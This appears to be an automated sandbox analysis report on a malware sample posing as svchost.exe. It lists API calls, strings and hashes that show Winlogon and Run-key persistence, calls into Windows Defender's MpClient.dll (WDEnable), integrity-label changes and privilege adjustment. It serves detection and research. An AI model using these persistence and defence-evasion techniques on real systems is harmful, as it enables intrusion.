                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02BB33DE
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SystemDrive, xrefs: 02BB333F
                                                                                                                                                                                                                • userinit, xrefs: 02BB33F6
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 02BB33D4
                                                                                                                                                                                                                • C:\Windows\apppatch\svchost.exe, xrefs: 02BB33B4, 02BB33EB
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02BB339D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,7556F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB75A8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB75AF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB75CF
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB75E0
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 02BB75F0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2214028410-0
                                                                                                                                                                                                                • Opcode ID: ff7d09f1c406c82f4812dfae6d1d18174498ab6f0bf456797ae3c7ec2d930700
                                                                                                                                                                                                                • Instruction ID: f05557522342c282cabe9d1606515fad29341b953299d1aa206b0e5b30a41fe4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff7d09f1c406c82f4812dfae6d1d18174498ab6f0bf456797ae3c7ec2d930700
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A41B072A40304BBEB319FB59C49FAFBBACEF84751F508654FA05A7181DBB49510CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,7556F380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02BB738D
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BB73B4
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 02BB73D5
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BB73EE
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BB73F8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000), ref: 02BB740C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB741B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB742D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB743D
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 02BB744A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB746C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB747D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: 75e07169306e0444344d7d550945dcedee181debbb28766800361b3626da3fd7
                                                                                                                                                                                                                • Instruction ID: 396ef81e0774c3c0baa0333d3cdfe3a58da3b7d03874aff2f0b23c168e2ee6cc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75e07169306e0444344d7d550945dcedee181debbb28766800361b3626da3fd7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2419336A80208BBE7218F64DC89FEEBB6CEF84755F548155FE04DB1C0DBB0955187A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                                • userinit, xrefs: 00402A38
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                                • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3547530944-2324515132
                                                                                                                                                                                                                • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                                • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02BD56B7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 02BD572A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 02BD574C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 02BD5758
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 02BD5766
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02BB77DE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB77E5
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB77F9
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,02BD45C4,00000104), ref: 02BB7808
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000), ref: 02BB780F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7883
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB7886
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7893
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB7896
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: 9E9388F8a$software\microsoft
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6B41
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6B5F
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02BB6B7A
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(80000001,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6BA1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: 9E9388F8a$software\microsoft
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,75570F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                                • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                                • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4908
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                                • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                                • API String ID: 1010965793-1794910726
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                                • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                • String ID: Windows Explorer
                                                                                                                                                                                                                • API String ID: 1140695583-228612681
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC2587
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7556F550,00000000), ref: 02BC259E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,7556F550,00000000), ref: 02BC25AB
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?,?,7556F550,00000000), ref: 02BC25E7
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(02C09F08,00000000,00000104,00000000,00000001,?,7556F550,00000000), ref: 02BC2611
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02BC2620
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,7556F550,00000000), ref: 02BC2623
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02BC2630
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,7556F550,00000000), ref: 02BC2633
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID: 9e938de8a
                                                                                                                                                                                                                • API String ID: 780088666-94776983
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02BC4EFF
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F02
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F0F
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4F12
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F2A
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F2D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F3A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4F3D
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02BC4F53
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02BC4F5D
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02BC4F67
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
